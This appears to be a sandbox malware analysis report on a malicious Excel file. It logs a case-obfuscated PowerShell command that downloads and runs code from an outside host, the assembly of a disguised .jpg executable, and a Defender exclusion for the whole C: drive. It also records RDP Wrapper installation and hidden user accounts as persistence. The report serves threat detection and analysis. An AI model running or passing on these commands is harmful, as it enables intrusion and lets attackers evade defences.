        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES578D.tmp' 'c:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP'
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c COpY /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c Wmic PROcEss CALl creaTe %TEMP%\Test3.jpg
        Source: unknownProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe Wmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpg
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c COpY /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c Wmic PROcEss CALl creaTe %TEMP%\Test3.jpg
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES578D.tmp' 'c:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP'
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe Wmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpg
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgFile written: C:\Program Files\Microsoft DN1\rdpwrap.iniJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgDirectory created: C:\Program Files\Microsoft DN1\sqlmap.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgDirectory created: C:\Program Files\Microsoft DN1\rdpwrap.iniJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
        Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000000A.00000002.752607255.0000000001210000.00000002.00000001.sdmp
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp
        Source: Binary string: RfxVmt.pdb source: Test3.jpg, 00000013.00000003.817118818.0000000004081000.00000004.00000001.sdmp
        Source: Binary string: RfxVmt.pdbGCTL source: Test3.jpg, 00000013.00000003.817118818.0000000004081000.00000004.00000001.sdmp
        Source: Binary string: wuser32.pdb source: Test3.jpg, 00000013.00000002.946620033.0000000003979000.00000004.00000001.sdmp
        Source: Binary string: wuser32.pdbUGP source: Test3.jpg, 00000013.00000002.946620033.0000000003979000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp

        Data Obfuscation:

        barindex
        Detected unpacking (changes PE section rights)Show sources
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgUnpacked PE file: 19.2.Test3.jpg.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;.bss:R;
        Detected unpacking (overwrites its own PE header)Show sources
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgUnpacked PE file: 19.2.Test3.jpg.400000.0.unpack
        PowerShell case anomaly foundShow sources
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline'
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 18_2_0042CE66 push dword ptr [ecx+esi*2+0Ch]; ret
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 18_2_0042C489 push edx; ret
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 18_2_00402F43 pushfd ; iretd
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_035222DC push 8BFFFFFFh; iretd
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_03522830 pushfd ; ret
        Source: initial sampleStatic PE information: section name: .text entropy: 7.60065118993

        Persistence and Installation Behavior:

        barindex
        Creates processes via WMIShow sources
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Test3.jpgJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgFile created: C:\Program Files\Microsoft DN1\sqlmap.dllJump to dropped file
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Test1.txtJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.dllJump to dropped file
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Test1.txtJump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Test3.jpgJump to dropped file
        Source: C:\Windows\system32\drivers\tsusbhub.sysRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\ParametersJump to behavior

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Contains functionality to hide user accountsShow sources
        Source: Test3.jpg, 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: Test3.jpg, 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
        Source: Test3.jpg, 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: Test3.jpg, 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgFile opened: C:\Windows\SysWOW64\:Zone.Identifier read attributes | delete
        Hides user accountsShow sources
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList .mFDHmaJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
